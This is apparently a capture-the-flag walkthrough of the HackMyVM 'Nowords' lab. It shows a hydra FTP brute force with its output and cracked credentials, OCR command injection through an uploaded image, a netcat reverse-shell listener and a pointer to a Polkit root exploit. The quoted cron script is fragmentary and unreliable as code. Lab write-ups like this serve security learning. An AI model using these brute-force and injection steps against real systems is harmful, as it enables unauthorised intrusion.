HackMyVm Nowords Walkthrough
Below is main steps.
Nmap scan ports, scan port 80, found hints at index.html.
~ curl http://192.168.56.100/index.html
<!-- [usernames and passwords are lowercase] -->
Download robots.txt, it's actually an PNG file, with some strings in it.
OCR the strings online, make a dic, and scan port 80 again, found only 1 valid files. Download it, and it's actually a JPG file with some strings.
OCR again, lower the first char of each word, make a dic. Then brute force ftp.
~ hydra -L pass2.txt -P pass2.txt 192.168.56.100 -t 64 ftp -f fish-0 | 0 [12:54:58]
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-07-06 12:55:22
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 64 tasks per 1 server, overall 64 tasks, 5776 login tries (l:76/p:76), ~91 tries per task
[DATA] attacking ftp://192.168.56.100:21/
[ftp] host: 192.168.56.100 login: sophie password: natalia
[STATUS] attack finished for 192.168.56.100 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-07-06 12:56:28
Through the ftp, we can browse the whole machine. In /home/sophie, found command.jpg and log.txt.
In /home/me, found doit.py.
~ cat doit.py fish-0 | 0 [13:50:38]
# coding: utf-8
import Image, ImageOps, ImageEnhance, imread
from PIL import Image, ImageOps, ImageEnhance
captcha = pytesseract.image_to_string(Image.open(path))
if __name__ == '__main__':
text = solve_captcha("/home/sophie/command.jpg")
a = text.split("\n")
f = open("/home/sophie/log.txt","w")
f.write(" Executing: "+text)
The script means, we need to put and bash command in command.jpg, then cron job will do OCR and run the command.
We put shell code in command.jpg, then upload through ftp.
Wait a minute, we will get reverse shell.
~ nc -nlvp 1234 fish-0 | 0 [13:09:25]
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.100.
Ncat: Connection from 192.168.56.100:49930.
bash: cannot set terminal process group (136083): Inappropriate ioctl for device
bash: no job control in this shell
The root step is use the Ubuntu Polkit Vulnerability.
Check the POC here.